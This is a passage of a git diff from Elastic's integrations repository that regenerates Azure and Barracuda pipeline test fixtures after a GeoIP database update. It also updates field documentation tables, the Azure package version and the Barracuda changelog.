@@ -56,7 +50,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.716497500Z", + "ingested": "2021-12-14T14:35:45.578585299Z", "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", @@ -130,20 +124,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -179,7 +167,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.716506200Z", + "ingested": "2021-12-14T14:35:45.578587845Z", "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json index a411804ae1a..60ce642c0c9 100644 --- a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json +++ b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json @@ -16,7 +16,7 @@ }, "event": { "action": "Microsoft.AppPlatform/Spring/logs", - "ingested": "2021-12-09T13:31:00.534484200Z", + "ingested": "2021-12-14T14:35:46.238519219Z", "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}", "kind": "event" }, diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md index 3b72a2bb244..46fd35439c0 100644 --- a/packages/azure/docs/README.md +++ b/packages/azure/docs/README.md 
@@ -234,6 +234,7 @@ An example event for `activitylogs` looks as following:
 | geo.country_iso_code | Country ISO code. | keyword |
 | geo.country_name | Country name. | keyword |
 | geo.location | Longitude and latitude. | geo_point |
+| geo.name | User-defined description of a location, at the level of granularity they care about. Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. Not typically used in automated geolocation. | keyword |
 | geo.region_iso_code | Region ISO code. | keyword |
 | geo.region_name | Region name. | keyword |
 | host.architecture | Operating system architecture. | keyword |
diff --git a/packages/azure/docs/activitylogs.md b/packages/azure/docs/activitylogs.md
index 01e69aa8c0b..3ddaee5e69c 100644
--- a/packages/azure/docs/activitylogs.md
+++ b/packages/azure/docs/activitylogs.md
@@ -223,6 +223,7 @@ An example event for `activitylogs` looks as following:
 | geo.country_iso_code | Country ISO code. | keyword |
 | geo.country_name | Country name. | keyword |
 | geo.location | Longitude and latitude. | geo_point |
+| geo.name | User-defined description of a location, at the level of granularity they care about. Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. Not typically used in automated geolocation. | keyword |
 | geo.region_iso_code | Region ISO code. | keyword |
 | geo.region_name | Region name. | keyword |
 | host.architecture | Operating system architecture. | keyword |
diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml
index b94220976e6..6189eb89b74 100644
--- a/packages/azure/manifest.yml
+++ b/packages/azure/manifest.yml
@@ -1,6 +1,6 @@
 name: azure
 title: Azure Logs
-version: 0.12.1
+version: 0.12.2
 release: beta
 description: This Elastic integration collects logs from Azure
 type: integration
diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index 013f95d09ab..618844e86ed 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.7.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index c29ba6d128a..fe0c1220405 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[avolupt]: 10.224.15.48 nto sse accept tur 3 illumqui 1090 1.2364 ivelitse ritin", "event": { - "ingested": "2021-06-09T09:46:40.867376100Z" + "ingested": "2021-12-14T14:35:57.048680403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: etdo[10.173.228.223] ntsunti 1455282753 1455282753 SCAN nseq itinvol psa umq 0 31 psaq SZ:cer SUBJ:reveri", "event": { - "ingested": "2021-06-09T09:46:40.867399100Z" + "ingested": "2021-12-14T14:35:57.048683221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.104.162.169 eosquir orsi nulapari allow vol 4 uidolor nibus mipsumq \u003c\u003cgnaali\u003e: enatus", "event": { - "ingested": "2021-06-09T09:46:40.867407400Z" + "ingested": "2021-12-14T14:35:57.048683733Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[iatu]: 10.57.70.73 dolo meumfug deny roinBCS 2 com 1060 1.2548 byC tinculp", "event": { - "ingested": "2021-06-09T09:46:40.867413500Z" + "ingested": "2021-12-14T14:35:57.048684177Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.236.42.236 tconsec nsequat taev block untutl 1 llu uptassi tamremap tur", "event": { - "ingested": "2021-06-09T09:46:40.867464300Z" + "ingested": "2021-12-14T14:35:57.048684561Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (enatuse.exe) queued as magn", "event": { - "ingested": "2021-06-09T09:46:40.867471400Z" + "ingested": "2021-12-14T14:35:57.048684963Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[sit]: avol[10.162.151.94] laboreet 1461457525 1461457525 RECV aquaeabi giatq quid", "event": { - "ingested": "2021-06-09T09:46:40.867477400Z" + "ingested": "2021-12-14T14:35:57.048685364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: tempor[10.138.137.28] eip 1462692479 1462692479 SCAN lupta iusmodt doloreeu pori 7 8 ect SZ:reetdolo SUBJ:nrepreh", "event": { - "ingested": "2021-06-09T09:46:40.867483100Z" + "ingested": "2021-12-14T14:35:57.048685755Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: ari[10.108.180.105] nsequat 1463927433 1463927433 block llam llamcorp ari eataevit 4 38 uovol dmi", "event": { - "ingested": "2021-06-09T09:46:40.867489300Z" + "ingested": "2021-12-14T14:35:57.048686151Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.206.159.177] ididu 1465162388 1465162388 RECV ciunt turQuisa 10 74 lit", "event": { - "ingested": "2021-06-09T09:46:40.867494900Z" + "ingested": "2021-12-14T14:35:57.048686547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[umdo]: sed[10.206.224.241] reetdolo 1466397342 1466397342 RECV olupta turveli 4 40 tatno", "event": { - "ingested": "2021-06-09T09:46:40.867519600Z" + "ingested": "2021-12-14T14:35:57.048686956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: aveniam[10.82.201.113] essequ 1467632296 1467632296 SCAN taevi ender snulapar aedic 5 13 iumto SZ:aboreetd SUBJ:sun", "event": { - "ingested": 
"2021-06-09T09:46:40.867528500Z" + "ingested": "2021-12-14T14:35:57.048687953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tem.exe) queued as ons", "event": { - "ingested": "2021-06-09T09:46:40.867534900Z" + "ingested": "2021-12-14T14:35:57.048688440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.110.109.5 ittenbyC aperi lor accept ipi 4 paqu eseru remeum #to#10.18.165.35", "event": { - "ingested": "2021-06-09T09:46:40.867547500Z" + "ingested": "2021-12-14T14:35:57.048688826Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: dolore[10.195.109.134] eddoei 1471337159 1471337159 deny etM nimadmin ditautfu piscing 6 74 ostr rudexerc", "event": { - "ingested": "2021-06-09T09:46:40.867552800Z" + "ingested": "2021-12-14T14:35:57.048689219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[colabor]: iusmodt[10.21.92.218] lorumw 1472572113 1472572113 accept llitani inima tlabo suntexp 4 45 stiae SZ:nofdeF SUBJ:sunt", "event": { - "ingested": "2021-06-09T09:46:40.867558100Z" + "ingested": "2021-12-14T14:35:57.048689630Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tat.exe) queued as tion", "event": { - "ingested": "2021-06-09T09:46:40.867563300Z" + "ingested": "2021-12-14T14:35:57.048690163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (emp.exe) queued as aperia", "event": { - "ingested": "2021-06-09T09:46:40.867568200Z" + "ingested": "2021-12-14T14:35:57.048690553Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Ret Policy Summary (Del:eritquii Kept:dexeac)", "event": { - "ingested": "2021-06-09T09:46:40.867572700Z" + "ingested": "2021-12-14T14:35:57.048690961Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.45.25.68] LOGOUT (rehender)", "event": { - "ingested": "2021-06-09T09:46:40.867577Z" + "ingested": "2021-12-14T14:35:57.048691345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Ret Policy Summary (Del:hil Kept:atquovo)", "event": { - "ingested": "2021-06-09T09:46:40.867581400Z" + "ingested": "2021-12-14T14:35:57.048691731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[tatn]: 10.18.109.121 ents pida allow idolor 1 emoeni 269 1.2857 utlabore ecillu", "event": { - "ingested": "2021-06-09T09:46:40.867585800Z" + "ingested": "2021-12-14T14:35:57.048692119Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.19.194.101] global CHANGE orinrepr (conse)", "event": { - "ingested": "2021-06-09T09:46:40.867590300Z" + "ingested": "2021-12-14T14:35:57.048692506Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (lumqui.exe) queued as itinvo", "event": { - "ingested": "2021-06-09T09:46:40.867595600Z" + "ingested": "2021-12-14T14:35:57.048693005Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (usmodt.exe) queued as siar", "event": { - "ingested": 
"2021-06-09T09:46:40.867648200Z" + "ingested": "2021-12-14T14:35:57.048693400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[sci]: 10.116.193.182 snostrud nama allow data 1 ationul 2530 1.5361 commod adol", "event": { - "ingested": "2021-06-09T09:46:40.867655700Z" + "ingested": "2021-12-14T14:35:57.048693790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: hitect[10.198.6.166] modocon 1486156610 1486156610 SCAN que atevel nsecte itame 0 38 lit5929.test quamnih", "event": { - "ingested": "2021-06-09T09:46:40.867661800Z" + "ingested": "2021-12-14T14:35:57.048694182Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.198.19.111 aquaeabi lita adeseru accept amc 4 amest corp modtemp \u003c\u003crehender\u003e: iae", "event": { - "ingested": "2021-06-09T09:46:40.867666900Z" + "ingested": "2021-12-14T14:35:57.048694560Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: equat[10.77.137.72] ione 1488626519 1488626519 SCAN ihilmole eriamea amre rsita 8 56 uptat3156.www5.test tmo", "event": { - "ingested": "2021-06-09T09:46:40.867672100Z" + "ingested": "2021-12-14T14:35:57.048694948Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: vitaedi[10.128.114.77] temqu 1489861473 1489861473 SCAN edol colab ommodico quatD 4 59 neav6028.internal.domain agnid", "event": { - "ingested": "2021-06-09T09:46:40.867707700Z" + "ingested": "2021-12-14T14:35:57.048695353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "outbound/smtp: 10.181.80.139 hitecto ents liquide allow tenatu 1 boN eprehend aevit aboN", "event": { - "ingested": "2021-06-09T09:46:40.867714500Z" + "ingested": "2021-12-14T14:35:57.048695738Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ris]: uamqu[10.138.252.123] quioffi 1492331381 1492331381 RECV uptate ncidid quaturve", "event": { - "ingested": "2021-06-09T09:46:40.867719400Z" + "ingested": "2021-12-14T14:35:57.048696145Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (aera.exe) queued as ate", "event": { - "ingested": "2021-06-09T09:46:40.867724900Z" + "ingested": "2021-12-14T14:35:57.048696531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.153.108.27] uir 1494801290 1494801290 RECV dol essecil citation", "event": { - "ingested": "2021-06-09T09:46:40.867729900Z" + "ingested": "2021-12-14T14:35:57.048696923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.120.167.239 gnido ratvolu olup deny nsecte 3 eveli eroi dtemp aliquide", "event": { - "ingested": "2021-06-09T09:46:40.867734800Z" + "ingested": "2021-12-14T14:35:57.048697431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ris]: nisi[10.105.88.20] ecte 1497271198 1497271198 RECV tinvolu iurer iciadese", "event": { - "ingested": "2021-06-09T09:46:40.867741600Z" + "ingested": "2021-12-14T14:35:57.048697822Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: olupta[10.98.92.244] idolor 1498506153 
1498506153 deny uta llumdolo nre ercitat 7 38 riosamn SZ:ept SUBJ:iumtotam", "event": { - "ingested": "2021-06-09T09:46:40.867746Z" + "ingested": "2021-12-14T14:35:57.048698219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[sperna]: sintocc[10.185.107.75] tDuisaut 1499741107 1499741107 allow tate imvenia spi stquido 8 62 ptas SZ:pta SUBJ:tetu", "event": { - "ingested": "2021-06-09T09:46:40.867750200Z" + "ingested": "2021-12-14T14:35:57.048698612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (nevo.exe) queued as ide", "event": { - "ingested": "2021-06-09T09:46:40.867754300Z" + "ingested": "2021-12-14T14:35:57.048699017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[etcons]: 10.80.214.206 ate uiac accept officiad 4 quinesc 6218 1.5651 tur roi", "event": { - "ingested": "2021-06-09T09:46:40.867758400Z" + "ingested": "2021-12-14T14:35:57.048699404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[nof]: 10.48.34.226 ccaec ten allow isc 2 ntN 6179 1.2364 tateve itinvol", "event": { - "ingested": "2021-06-09T09:46:40.867762500Z" + "ingested": "2021-12-14T14:35:57.048699786Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (etconsec.exe) queued as ios", "event": { - "ingested": "2021-06-09T09:46:40.867766800Z" + "ingested": "2021-12-14T14:35:57.048700180Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: tquov[10.211.93.62] mod 1505915878 1505915878 SCAN hilm ataevi com tnulapa 5 
57 tiumt SZ:reetdolo SUBJ:norum", "event": { - "ingested": "2021-06-09T09:46:40.867771Z" + "ingested": "2021-12-14T14:35:57.048700569Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (uidol.exe) queued as mporin", "event": { - "ingested": "2021-06-09T09:46:40.867775Z" + "ingested": "2021-12-14T14:35:57.048700961Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: qui[10.199.182.123] entor 1508385787 1508385787 accept Sedutp utp ema rsitv 0 69 ntiumt iquipe", "event": { - "ingested": "2021-06-09T09:46:40.867779Z" + "ingested": "2021-12-14T14:35:57.048701351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tvolupt.exe) queued as eufugi", "event": { - "ingested": "2021-06-09T09:46:40.867783100Z" + "ingested": "2021-12-14T14:35:57.048701749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[pid]: illoin[10.130.38.118] uamni 1510855695 1510855695 block gnamal metMalo ntexplic archite 1 56 untu asi", "event": { - "ingested": "2021-06-09T09:46:40.867787600Z" + "ingested": "2021-12-14T14:35:57.048702146Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.153.152.219] eumiu 1512090649 1512090649 RECV orumSe boree intoc", "event": { - "ingested": "2021-06-09T09:46:40.867791500Z" + "ingested": "2021-12-14T14:35:57.048702533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Retention violating accounts: rnatur total", "event": { - "ingested": "2021-06-09T09:46:40.867795400Z" + "ingested": 
"2021-12-14T14:35:57.048702929Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (isisten.exe) queued as cusant", "event": { - "ingested": "2021-06-09T09:46:40.867799400Z" + "ingested": "2021-12-14T14:35:57.048703324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (naal.exe) queued as borios", "event": { - "ingested": "2021-06-09T09:46:40.867803600Z" + "ingested": "2021-12-14T14:35:57.048703812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.167.227.44 tali lillum cusant deny ender 2 oles edic seq tutlab", "event": { - "ingested": "2021-06-09T09:46:40.867807700Z" + "ingested": "2021-12-14T14:35:57.048704198Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[atevelit]: 10.56.136.27 aperia ccaeca deny ttenby 1 amc 5163 1.375 orumSe ratv", "event": { - "ingested": "2021-06-09T09:46:40.867811700Z" + "ingested": "2021-12-14T14:35:57.048704576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.194.90.130] FAILED_LOGIN (siut)", "event": { - "ingested": "2021-06-09T09:46:40.867815600Z" + "ingested": "2021-12-14T14:35:57.048704965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.103.69.44] velitess 1520735329 1520735329 RECV naali uunturm temUte", "event": { - "ingested": "2021-06-09T09:46:40.867819700Z" + "ingested": "2021-12-14T14:35:57.048705357Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "inbound/pass1: aveni[10.29.155.171] uptatema 1521970284 1521970284 SCAN oeni tdol sit tiaec 6 23 oremagna3521.mail.home asiar", "event": { - "ingested": "2021-06-09T09:46:40.867823800Z" + "ingested": "2021-12-14T14:35:57.048706369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.145.193.93] nonp 1523205238 1523205238 RECV labo ulapar aboreetd", "event": { - "ingested": "2021-06-09T09:46:40.867828Z" + "ingested": "2021-12-14T14:35:57.048706808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ama]: uatur[10.143.79.226] exeacom 1524440192 1524440192 RECV roidents tem dol", "event": { - "ingested": "2021-06-09T09:46:40.867838300Z" + "ingested": "2021-12-14T14:35:57.048707223Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.30.25.84] FAILED_LOGIN (utlab)", "event": { - "ingested": "2021-06-09T09:46:40.867850200Z" + "ingested": "2021-12-14T14:35:57.048707612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.141.225.182] bor 1526910101 1526910101 RECV rauto ationev 8 57 uaUten", "event": { - "ingested": "2021-06-09T09:46:40.867857200Z" + "ingested": "2021-12-14T14:35:57.048708030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 